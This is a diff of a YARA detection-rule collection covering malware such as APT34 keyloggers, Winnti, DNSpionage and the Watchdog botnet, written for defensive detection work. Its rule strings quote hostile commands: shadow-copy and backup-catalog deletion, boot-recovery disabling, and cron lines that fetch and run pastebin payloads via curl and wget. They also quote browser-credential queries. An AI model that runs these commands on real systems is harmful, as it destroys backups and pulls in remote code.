-		$str06 = "/c vssadmin.exe delete shadows /all /quiet"
-		$str07 = "/c bcdedit /set {default} bootstatuspolicy ignoreallfailures -y"
-		$str08 = "/c bcdedit /set {default} recoveryenabled No -y"
-		$str09 = "/c wbadmin delete catalog -quiet"
-		$str10 = "/c wmic shadowcopy delete -y"
-		$uniq00 = "fuckav"
-		$uniq01 = "DECRYPT.hta" nocase
-		$uniq02 = "Backup e-mail for contact :"
-		$uniq03 = "<HTA:APPLICATION APPLICATIONNAME=" nocase
+		$str1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword
+		$str2 = "MsgBox.exe" wide fullword
+		$str4 = "\\System32\\cmd.exe" wide fullword
+		$str6 = "Ave_Maria" wide
+		$str7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" ascii fullword
+		$str8 = "SMTP Password" wide fullword
+		$str11 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide fullword
+		$str12 = "\\sqlmap.dll" wide fullword
+		$str14 = "SELECT * FROM logins" ascii fullword
+		$str16 = "Elevation:Administrator!new" wide
+		$str17 = "/n:%temp%" ascii wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB ) and ( 5 of ( $str* ) or all of them )
+}
+rule DEADBITS_APT32_Ratsnif : APT32 TROJAN WINMALWARE FILE
+{
+	meta:
+		description = "No description has been set in the source file - DeadBits"
+		author = "Adam Swanda"
+		id = "d3664a84-bb53-5715-8b0d-e63f43d62496"
+		date = "2019-07-18"
+		modified = "2019-08-08"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT32_Ratsnif.yara#L1-L65"
+		license_url = "N/A"
+		logic_hash = "a33eb2bb9ffe02f9b3fe706bd6a611457c669adc24c34f12d9014ed29ba1399f"
+		score = 75
+		quality = 55
+		tags = "APT32, TROJAN, WINMALWARE, FILE"
+		Author = "Adam M. Swanda"
+
+	strings:
+		$pdb0 = "X:\\Project\\BotFrame\\Debug\\Client.pdb" ascii fullword
+		$str1 = "LastIP" ascii fullword
+		$str2 = "LastOnline" ascii fullword
+		$str3 = "LoaderType" ascii fullword
+		$str4 = "Payload" ascii fullword
+		$str5 = "PayloadFile" ascii fullword
+		$str6 = "ClientCommand" ascii fullword
+		$str7 = "ClientId" ascii fullword
+		$str8 = "UserAdmin" ascii fullword
+		$str9 = "User" ascii fullword
+		$str10 = "Password" ascii fullword
+		$str11 = "Access" ascii fullword
+		$str12 = "CreateDate" ascii fullword
+		$str13 = "CreateBy" ascii fullword
+		$str14 = "UserName" ascii fullword
+		$str15 = "ComputerName" ascii fullword
+		$str16 = "Domain" ascii fullword
+		$str17 = "OSType" ascii fullword
+		$str18 = "OSArch" ascii fullword
+		$str19 = "OSVer" ascii fullword
+		$str20 = "InstallDate" ascii fullword
+		$str21 = "LastLoadCommandID" ascii fullword
+		$str22 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" ascii fullword
+		$str25 = "#########################Program starting up#########################" ascii fullword
+		$str26 = "Stop poison" ascii fullword
+		$str27 = "Shell:" ascii fullword
+		$str28 = "shell" ascii fullword
+		$str29 = "Select http redirect domain:" ascii fullword
+		$str30 = "HTTP redirect add file extension:" ascii fullword
+		$str32 = "exIp" ascii fullword
+		$str33 = "Start Poison" ascii fullword
+		$str34 = "vicIP" ascii fullword
+		$str35 = "Insert JSTag" ascii fullword
+		$str36 = "devIp" ascii fullword
+		$str37 = "TransmitTcp" ascii fullword
+		$str38 = "Remove poison IP: %s" ascii fullword
+		$str39 = "Remove my ip or gateway ip: %s" ascii fullword
+		$cnc0 = "/cl_client_online.php" ascii fullword
+		$cnc1 = "/cl_client_cmd.php" ascii fullword
+		$cnc2 = "/cl_client_cmd_res.php" ascii fullword
+		$cnc3 = "/cl_client_file_download.php" ascii fullword
+		$cnc4 = "/ad_file_download.php" ascii fullword
+		$cnc5 = "/cl_client_file_upload.php" ascii fullword
+		$cnc6 = "/cl_client_logs.php" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $name00 and 5 of ( $str* ) ) or ( 5 of ( $str* ) and 2 of ( $uniq* ) ) or ( $name00 and any of ( $uniq* ) ) )
+		( uint16( 0 ) == 0x5a4d ) and ( ( 10 of ( $str* ) and 3 of ( $cnc* ) ) or ( 3 of ( $cnc* ) and $pdb0 ) )
 }
-rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE
+rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "74a6a408-2f0e-567d-8968-c304d258df81"
-		date = "2019-07-22"
+		id = "d90dec69-1a8b-547c-a302-d00c612a71ed"
+		date = "2019-07-18"
 		modified = "2019-07-22"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43"
+		reference = "https://github.com/deadbits/yara-rules"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/winnti_linux.yara#L1-L37"
 		license_url = "N/A"
-		logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582"
+		logic_hash = "216c103b4ffceaa0540b8c81645d3fd91a7dab2b32b1cf84ccb85f134c9d23c8"
 		score = 75
-		quality = 78
-		tags = "APT34, WINMALWARE, KEYLOGGER, FILE"
-		Description = "APT34 Keylogger"
+		quality = 76
+		tags = "LINUXMALWARE, FILE"
+		Author = "Adam M. Swanda"
 
 	strings:
-		$log = "c:\\windows\\temp\\log.txt" ascii fullword
-		$clipboard = "---------------CLIPBOARD------------" ascii fullword
-		$func0 = "\"Main Invoked.\"" ascii fullword
-		$func1 = "\"Main Returned.\"" ascii fullword
-		$logger3 = ">---------------------------------------------------" ascii fullword
-		$logger4 = "[ENTER]" ascii fullword
-		$logger5 = "[CapsLock]" ascii fullword
-		$logger6 = "[CRTL]" ascii fullword
-		$logger7 = "[PAGE_UP]" ascii fullword
-		$logger8 = "[PAGE_DOWN]" ascii fullword
-		$logger9 = "[HOME]" ascii fullword
-		$logger10 = "[LEFT]" ascii fullword
-		$logger11 = "[RIGHT]" ascii fullword
-		$logger12 = "[DOWN]" ascii fullword
-		$logger13 = "[PRINT]" ascii fullword
-		$logger14 = "[PRINT SCREEN]" ascii fullword
-		$logger15 = "[INSERT]" ascii fullword
-		$logger16 = "[SLEEP]" ascii fullword
-		$logger17 = "[PAUSE]" ascii fullword
-		$logger18 = "[TAB]" ascii fullword
-		$logger19 = "[ESC]" ascii fullword
-		$logger20 = "[DEL]" ascii fullword
-		$logger21 = "[ALT]" ascii fullword
+		$str0 = "HIDE_THIS_SHELL=x"
+		$str1 = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null" ascii fullword
+		$str2 = "mutex.max:  %lu" ascii fullword
+		$str3 = "mutex.err:  %lu" ascii fullword
+		$str4 = "/tmp/ans.log" ascii fullword
+		$str5 = "mutex.used: %lu" ascii fullword
+		$str6 = "Warning: Some of the worker threads may have failed to exit." ascii fullword
+		$str7 = "line %d - " ascii fullword
+		$str8 = "Warning an error has occurred when trying to obtain a worker task." ascii fullword
+		$str9 = "6CMutex" ascii fullword
+		$str10 = "Failed to obtain an empty task from the free tasks queue." ascii fullword
+		$str11 = "A problem was detected in the queue (expected NULL, but found a different value)." ascii fullword
+		$str12 = "Failed to a task to the free tasks queue during initialization." ascii fullword
+		$str13 = "/var/run/libudev1.pid" ascii fullword
+		$str14 = "__pthread_key_create" ascii fullword
+		$str15 = "The threadpool received as argument is NULL." ascii fullword
+		$str16 = "Failed to enqueue a task to free tasks queue." ascii fullword
+		$str17 = "Failed to obtain a task from the jobs queue." ascii fullword
+		$str18 = "Failed to add a new task to the tasks queue." ascii fullword
+		$str19 = "setsockopt  failed" ascii fullword
+		$str20 = "libxselinux.so" ascii fullword
+		$str21 = "/lib/libxselinux" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $log and all of ( $func* ) and all of ( $logger* ) and $clipboard
+		uint16( 0 ) == 0x457f and 8 of them
 }
 rule DEADBITS_Dacls_Trojan_Linux
 {
@@ -66730,53 +67291,6 @@ rule DEADBITS_Dacls_Trojan_Linux
 	condition:
 		uint32be( 0x0 ) == 0x7f454c46 and ( ( all of ( $cls* ) ) or ( all of ( $str* ) ) )
 }
-rule DEADBITS_Dnspionage : APT DNSCHANGER FILE
-{
-	meta:
-		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "9f740645-60dc-5376-94ad-59d8efbf1942"
-		date = "2019-07-18"
-		modified = "2019-07-19"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/DNSpionage.yara#L1-L47"
-		license_url = "N/A"
-		logic_hash = "f20c71d0698d98cc58fa199c708ec7bf5cb0ec62503a20b532e752dab9aab920"
-		score = 75
-		quality = 78
-		tags = "APT, DNSCHANGER, FILE"
-		Description = "Attempts to detect DNSpionage PE samples"
-		Author = "Adam M. Swanda"
-
-	strings:
-		$x00 = "/Loginnn?id=" fullword ascii
-		$hdr0 = "Content-Disposition: fo" fullword ascii
-		$hdr1 = "Content-Type: multi" fullword ascii
-		$ua0 = "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" fullword ascii
-		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" fullword ascii
-		$str0 = "send command result error! status code is: " fullword ascii
-		$str1 = "uploading command result form" fullword ascii
-		$str2 = "log.txt" fullword ascii
-		$str3 = "http host not found in config!" fullword ascii
-		$str4 = "send command result" fullword ascii
-		$str5 = "download error. status code: " fullword ascii
-		$str6 = "get command with dns" fullword ascii
-		$str7 = "dns host not found in config!" fullword ascii
-		$str8 = "command result is: " fullword ascii
-		$str9 = "command result size: " fullword ascii
-		$str10 = "connection type not found in config!" fullword ascii
-		$str11 = "commands: " fullword ascii
-		$str12 = "command is: " fullword ascii
-		$str13 = "port not found in config!" fullword ascii
-		$str14 = "download filename not found! " fullword ascii
-		$str15 = "base64 key not found in config!" fullword ascii
-		$str16 = "download filename is: " fullword ascii
-		$str17 = "config json is not valid" fullword ascii
-		$str18 = "config file will be changed from server!" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 5 of ( $str* ) ) or ( $x00 and ( 1 of ( $hdr* ) ) and 1 of ( $ua* ) ) )
-}
 rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE
 {
 	meta:
@@ -66835,152 +67349,141 @@ rule DEADBITS_APT34_VALUEVAULT : APT34 INFOSTEALER WINMALWARE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and ( ( 10 of ( $str* ) and 3 of ( $gopath* ) ) or ( $fsociety and $powershell and $gobuild ) or ( $fsociety and 10 of ( $str* ) ) )
 }
-rule DEADBITS_APT32_Ratsnif : APT32 TROJAN WINMALWARE FILE
+rule DEADBITS_Acbackdoor_ELF : LINUX MALWARE BACKDOOR
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
-		author = "Adam Swanda"
-		id = "d3664a84-bb53-5715-8b0d-e63f43d62496"
-		date = "2019-07-18"
-		modified = "2019-08-08"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT32_Ratsnif.yara#L1-L65"
+		author = "Adam M. Swanda"
+		id = "82eb41bf-cd1d-5b00-973b-31a79c75cfc0"
+		date = "2019-11-15"
+		modified = "2019-12-04"
+		reference = "https://www.intezer.com/blog-acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/ACBackdoor_Linux.yara#L1-L41"
 		license_url = "N/A"
-		logic_hash = "a33eb2bb9ffe02f9b3fe706bd6a611457c669adc24c34f12d9014ed29ba1399f"
+		logic_hash = "48d741fba86cdfc8aac779d4b3227d45a17e0e9fba74b19820f1b8308bb93322"
 		score = 75
 		quality = 55
-		tags = "APT32, TROJAN, WINMALWARE, FILE"
-		Author = "Adam M. Swanda"
+		tags = "LINUX, MALWARE, BACKDOOR"
 
 	strings:
-		$pdb0 = "X:\\Project\\BotFrame\\Debug\\Client.pdb" ascii fullword
-		$str1 = "LastIP" ascii fullword
-		$str2 = "LastOnline" ascii fullword
-		$str3 = "LoaderType" ascii fullword
-		$str4 = "Payload" ascii fullword
-		$str5 = "PayloadFile" ascii fullword
-		$str6 = "ClientCommand" ascii fullword
-		$str7 = "ClientId" ascii fullword
-		$str8 = "UserAdmin" ascii fullword
-		$str9 = "User" ascii fullword
-		$str10 = "Password" ascii fullword
-		$str11 = "Access" ascii fullword
-		$str12 = "CreateDate" ascii fullword
-		$str13 = "CreateBy" ascii fullword
-		$str14 = "UserName" ascii fullword
-		$str15 = "ComputerName" ascii fullword
-		$str16 = "Domain" ascii fullword
-		$str17 = "OSType" ascii fullword
-		$str18 = "OSArch" ascii fullword
-		$str19 = "OSVer" ascii fullword
-		$str20 = "InstallDate" ascii fullword
-		$str21 = "LastLoadCommandID" ascii fullword
-		$str22 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" ascii fullword
-		$str25 = "#########################Program starting up#########################" ascii fullword
-		$str26 = "Stop poison" ascii fullword
-		$str27 = "Shell:" ascii fullword
-		$str28 = "shell" ascii fullword
-		$str29 = "Select http redirect domain:" ascii fullword
-		$str30 = "HTTP redirect add file extension:" ascii fullword
-		$str32 = "exIp" ascii fullword
-		$str33 = "Start Poison" ascii fullword
-		$str34 = "vicIP" ascii fullword
-		$str35 = "Insert JSTag" ascii fullword
-		$str36 = "devIp" ascii fullword
-		$str37 = "TransmitTcp" ascii fullword
-		$str38 = "Remove poison IP: %s" ascii fullword
-		$str39 = "Remove my ip or gateway ip: %s" ascii fullword
-		$cnc0 = "/cl_client_online.php" ascii fullword
-		$cnc1 = "/cl_client_cmd.php" ascii fullword
-		$cnc2 = "/cl_client_cmd_res.php" ascii fullword
-		$cnc3 = "/cl_client_file_download.php" ascii fullword
-		$cnc4 = "/ad_file_download.php" ascii fullword
-		$cnc5 = "/cl_client_file_upload.php" ascii fullword
-		$cnc6 = "/cl_client_logs.php" ascii fullword
+		$ua_str = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" ascii fullword
+		$header1 = "Access-Control:" ascii fullword
+		$header2 = "X-Access" ascii
+		$initd = "/etc/init.d/update-notifier" ascii fullword
+		$str001 = "#!/bin/sh -e" ascii fullword
+		$str002 = "### BEGIN INIT INFO" ascii fullword
+		$str003 = "# Provides:          update-notifier" ascii fullword
+		$str004 = "# Required-Start:    $local_fs" ascii fullword
+		$str005 = "# Required-Stop:" ascii fullword
+		$str006 = "# Default-Start:     S" ascii fullword
+		$str007 = "# Default-Stop:" ascii fullword
+		$str008 = "### END INIT INFO" ascii fullword
+		$str010 = "  *) echo \"Usage: $0 {start|stop|restart|force-reload}\" >&2; ;;" ascii fullword
+		$str011 = "esac" ascii fullword
+		$str012 = "[ -x /usr/local/bin/update-notifier ] \\" ascii fullword
+		$str013 = "    && exec /usr/local/bin/update-notifier" ascii fullword
+		$rcd01 = "/etc/rc2.d/S01update-notifier" ascii fullword
+		$rcd02 = "/etc/rc3.d/S01update-notifier" ascii fullword
+		$rcd03 = "/etc/rc5.d/S01update-notifier" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( ( 10 of ( $str* ) and 3 of ( $cnc* ) ) or ( 3 of ( $cnc* ) and $pdb0 ) )
+		( uint32be( 0x0 ) == 0x7f454c46 ) and ( ( $ua_str and all of ( $header* ) and $initd and all of ( $rcd* ) ) or ( $ua_str and all of ( $header* ) and 10 of ( $str* ) ) )
 }
-rule DEADBITS_APT34_PICKPOCKET : APT APT34 INFOSTEALER WINMALWARE FILE
+rule DEADBITS_Watchdog_Botnet : BOTNET LINUXMALWARE EXPLOITATION CVE_2019_11581 CVE_2019_10149
 {
 	meta:
-		description = "Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018"
+		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "71db5c74-4964-5c5e-a830-242bfd0a2158"
+		id = "ae95f934-2a9b-5c65-a11f-ea946d7f1bc6"
 		date = "2019-07-22"
 		modified = "2019-07-22"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_PICKPOCKET.yara#L1-L30"
+		reference = "https://twitter.com/polarply/status/1153232987762376704"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/WatchBog_Linux.yara#L1-L100"
 		license_url = "N/A"
-		logic_hash = "7063cff3eb42c4468e01c9b214161cd306f7126f66650d99d43168730d1dc83a"
+		logic_hash = "aea8afdf118b79f701941ddd4306ee0f1c947ea59de5485ff977beff95e06d35"
 		score = 75
-		quality = 80
-		tags = "APT, APT34, INFOSTEALER, WINMALWARE, FILE"
+		quality = 53
+		tags = "BOTNET, LINUXMALWARE, EXPLOITATION, CVE_2019_11581, CVE_2019_10149"
+		Author = "Adam M. Swanda"
 
 	strings:
-		$s1 = "SELECT * FROM moz_logins;" ascii fullword
-		$s2 = "\\nss3.dll" ascii fullword
-		$s3 = "SELECT * FROM logins;" ascii fullword
-		$s4 = "| %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');" ascii fullword
-		$s5 = "\\Login Data" ascii fullword
-		$s6 = "%s\\Mozilla\\Firefox\\profiles.ini" ascii fullword
-		$s7 = "Login Data" ascii fullword
-		$s8 = "encryptedUsernamencryptedPasswor" ascii fullword
-		$s10 = "%s\\Mozilla\\Firefox\\%s" ascii fullword
-		$s11 = "encryptedUsername" ascii fullword
-		$s12 = "2013-12-06 14:53:30 27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii fullword
-		$s13 = "27392118af4c38c5203a04b8013e1afdb1cebd0d" ascii
-		$s15 = "= 'table' AND name!='sqlite_sequence'   AND coalesce(rootpage,1)>0" ascii fullword
-		$s18 = "[*] FireFox :" fullword wide
-		$s19 = "[*] Chrome :" fullword wide
-		$s20 = "username_value" ascii fullword
+		$py0 = "libpython" ascii
+		$str0 = "*/3 * * * * root wget -q -O- https://pastebin.com/raw/" ascii
+		$str1 = "*/1 * * * * root curl -fsSL https://pastebin.com/raw/" ascii
+		$str6 = "onion.to"
+		$str7 = /https?:\/\/pastebin.com\/raw/ nocase
+		$str8 = "http://icanhazip.com/"
+		$str9 = "http://ident.me/"
+		$scan0 = "Scan_run"
+		$scan1 = "scan_nexus"
+		$scan2 = "scan_couchdb"
+		$scan3 = "scan_jenkins"
+		$scan4 = "scan_laravel"
+		$scan5 = "scan_redis"
+		$exploit01 = "CVE_2015_4335"
+		$exploit02 = "CVE_2018_1000861"
+		$exploit03 = "CVE_2018_8007"
+		$exploit04 = "CVE_2019_1014"
+		$exploit05 = "CVE_2019_11581"
+		$exploit06 = "CVE_2019_7238"
+		$pwn0 = "pwn_couchdb"
+		$pwn1 = "pwn_jenkins"
+		$pwn2 = "pwn_jira"
+		$pwn3 = "pwn_nexus"
+		$pwn4 = "pwn_redis"
+		$pwn5 = "pwn_exim"
+		$payload = /payload(s)/ nocase
+		$jira_token = "atlassian.xsrf.token=%s" ascii fullword
+		$jira_cmd = "set ($cmd=\"%s\")" ascii fullword
+		$jira_id = "JSESSIONID=%s" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of them or all of them )
+		uint32be( 0x0 ) == 0x7f454c46 and $py0 and ( ( all of ( $pwn* ) and all of ( $scan* ) ) or ( $payload and all of ( $jira* ) and 5 of ( $str* ) ) or ( all of ( $str* ) and all of ( $exploit* ) ) )
 }
-rule DEADBITS_Winnti_Linux : LINUXMALWARE FILE
+rule DEADBITS_APT34_LONGWATCH : APT34 WINMALWARE KEYLOGGER FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "d90dec69-1a8b-547c-a302-d00c612a71ed"
-		date = "2019-07-18"
+		id = "74a6a408-2f0e-567d-8968-c304d258df81"
+		date = "2019-07-22"
 		modified = "2019-07-22"
-		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/winnti_linux.yara#L1-L37"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/APT34_LONGWATCH.yara#L1-L43"
 		license_url = "N/A"
-		logic_hash = "216c103b4ffceaa0540b8c81645d3fd91a7dab2b32b1cf84ccb85f134c9d23c8"
+		logic_hash = "8f9ed228325800baea3a2874c71337709c04d93419d4d56821a791dbce6f4582"
 		score = 75
-		quality = 76
-		tags = "LINUXMALWARE, FILE"
-		Author = "Adam M. Swanda"
+		quality = 78
+		tags = "APT34, WINMALWARE, KEYLOGGER, FILE"
+		Description = "APT34 Keylogger"
 
 	strings:
-		$str0 = "HIDE_THIS_SHELL=x"
-		$str1 = "/usr/sbin/dmidecode  | grep -i 'UUID' |cut -d' ' -f2 2>/dev/null" ascii fullword
-		$str2 = "mutex.max:  %lu" ascii fullword
-		$str3 = "mutex.err:  %lu" ascii fullword
-		$str4 = "/tmp/ans.log" ascii fullword
-		$str5 = "mutex.used: %lu" ascii fullword
-		$str6 = "Warning: Some of the worker threads may have failed to exit." ascii fullword
-		$str7 = "line %d - " ascii fullword
-		$str8 = "Warning an error has occurred when trying to obtain a worker task." ascii fullword
-		$str9 = "6CMutex" ascii fullword
-		$str10 = "Failed to obtain an empty task from the free tasks queue." ascii fullword
-		$str11 = "A problem was detected in the queue (expected NULL, but found a different value)." ascii fullword
-		$str12 = "Failed to a task to the free tasks queue during initialization." ascii fullword
-		$str13 = "/var/run/libudev1.pid" ascii fullword
-		$str14 = "__pthread_key_create" ascii fullword
-		$str15 = "The threadpool received as argument is NULL." ascii fullword
-		$str16 = "Failed to enqueue a task to free tasks queue." ascii fullword
-		$str17 = "Failed to obtain a task from the jobs queue." ascii fullword
-		$str18 = "Failed to add a new task to the tasks queue." ascii fullword
-		$str19 = "setsockopt  failed" ascii fullword
-		$str20 = "libxselinux.so" ascii fullword
-		$str21 = "/lib/libxselinux" ascii fullword
+		$log = "c:\\windows\\temp\\log.txt" ascii fullword
+		$clipboard = "---------------CLIPBOARD------------" ascii fullword
+		$func0 = "\"Main Invoked.\"" ascii fullword
+		$func1 = "\"Main Returned.\"" ascii fullword
+		$logger3 = ">---------------------------------------------------" ascii fullword
+		$logger4 = "[ENTER]" ascii fullword
+		$logger5 = "[CapsLock]" ascii fullword
+		$logger6 = "[CRTL]" ascii fullword
+		$logger7 = "[PAGE_UP]" ascii fullword
+		$logger8 = "[PAGE_DOWN]" ascii fullword
+		$logger9 = "[HOME]" ascii fullword
+		$logger10 = "[LEFT]" ascii fullword
+		$logger11 = "[RIGHT]" ascii fullword
+		$logger12 = "[DOWN]" ascii fullword
+		$logger13 = "[PRINT]" ascii fullword
+		$logger14 = "[PRINT SCREEN]" ascii fullword
+		$logger15 = "[INSERT]" ascii fullword
+		$logger16 = "[SLEEP]" ascii fullword
+		$logger17 = "[PAUSE]" ascii fullword
+		$logger18 = "[TAB]" ascii fullword
+		$logger19 = "[ESC]" ascii fullword
+		$logger20 = "[DEL]" ascii fullword
+		$logger21 = "[ALT]" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x457f and 8 of them
+		uint16( 0 ) == 0x5a4d and $log and all of ( $func* ) and all of ( $logger* ) and $clipboard
 }
 rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE
 {
@@ -67043,38 +67546,52 @@ rule DEADBITS_TA505_Flowerpippi : TA505 FINANCIAL BACKDOOR WINMALWARE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( ( 10 of ( $str* ) and $pipi ) or ( 10 of ( $str* ) and $pdb0 ) or ( 10 of ( $str* ) and 5 of ( $api* ) ) or ( all of them ) )
 }
-rule DEADBITS_Dacls_Trojan_Windows : FILE
+rule DEADBITS_Dnspionage : APT DNSCHANGER FILE
 {
 	meta:
 		description = "No description has been set in the source file - DeadBits"
 		author = "Adam Swanda"
-		id = "424b2c0d-2373-5a72-9a97-52b4bfc5cdcf"
-		date = "2020-01-07"
-		modified = "2020-01-07"
+		id = "9f740645-60dc-5376-94ad-59d8efbf1942"
+		date = "2019-07-18"
+		modified = "2019-07-19"
 		reference = "https://github.com/deadbits/yara-rules"
-		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/Dacls_Windows.yara#L1-L30"
+		source_url = "https://github.com/deadbits/yara-rules//blob/d002f7ecee23e09142a3ac3e79c84f71dda3f001/rules/DNSpionage.yara#L1-L47"
 		license_url = "N/A"
-		logic_hash = "b77df7e3be9c264d6a63d40dbf49c41e9dd55b4e570c063b5710b849c36cc166"
+		logic_hash = "f20c71d0698d98cc58fa199c708ec7bf5cb0ec62503a20b532e752dab9aab920"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 78
+		tags = "APT, DNSCHANGER, FILE"
+		Description = "Attempts to detect DNSpionage PE samples"
 		Author = "Adam M. Swanda"
 
 	strings:
-		$fext00 = ".exe" ascii wide
-		$fext01 = ".cmd" ascii wide
-		$fext02 = ".bat" ascii wide
-		$fext03 = ".com" ascii wide
-		$str00 = "Software\\mthjk" ascii wide
-		$str01 = "WindowsNT.dll" ascii fullword
-		$str02 = "GET %s HTTP/1.1" ascii fullword
-		$str03 = "content-length:" ascii fullword
-		$str04 = "Connection: keep-alive" ascii fullword
-		$cls00 = "c_2910.cls" ascii fullword
-		$cls01 = "k_3872.cls" ascii fullword
+		$x00 = "/Loginnn?id=" fullword ascii
+		$hdr0 = "Content-Disposition: fo" fullword ascii
+		$hdr1 = "Content-Type: multi" fullword ascii
+		$ua0 = "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36" fullword ascii
+		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" fullword ascii
+		$str0 = "send command result error! status code is: " fullword ascii
+		$str1 = "uploading command result form" fullword ascii
+		$str2 = "log.txt" fullword ascii
+		$str3 = "http host not found in config!" fullword ascii
+		$str4 = "send command result" fullword ascii
+		$str5 = "download error. status code: " fullword ascii
+		$str6 = "get command with dns" fullword ascii
+		$str7 = "dns host not found in config!" fullword ascii
+		$str8 = "command result is: " fullword ascii
+		$str9 = "command result size: " fullword ascii
+		$str10 = "connection type not found in config!" fullword ascii
+		$str11 = "commands: " fullword ascii
+		$str12 = "command is: " fullword ascii
+		$str13 = "port not found in config!" fullword ascii
+		$str14 = "download filename not found! " fullword ascii
+		$str15 = "base64 key not found in config!" fullword ascii
+		$str16 = "download filename is: " fullword ascii
+		$str17 = "config json is not valid" fullword ascii
+		$str18 = "config file will be changed from server!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( ( all of ( $cls* ) ) or ( all of ( $fext* ) and all of ( $str* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 5 of ( $str* ) ) or ( $x00 and ( 1 of ( $hdr* ) ) and 1 of ( $ua* ) ) )
 }
 rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE
 {
@@ -67089,7 +67606,7 @@ rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE
 		license_url = "N/A"
 		logic_hash = "819f01fdacea1e95f0f4d4f8e59ebae97ff9489a1be2c60e33253580a8f9e418"
 		score = 75
-		quality = 26
+		quality = 51
 		tags = "INSTALLER, MACOSMALWARE, FILE"
 		Author = "Adam M. Swanda"
 
@@ -67116,89 +67633,61 @@ rule DEADBITS_Crescentcore_DMG : INSTALLER MACOSMALWARE FILE
 	condition:
 		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xbebafeca ) and $header0 and $header1 and ( ( $path0 and ( any of ( $install* ) ) ) or ( 5 of ( $str* ) ) ) or all of them
 }
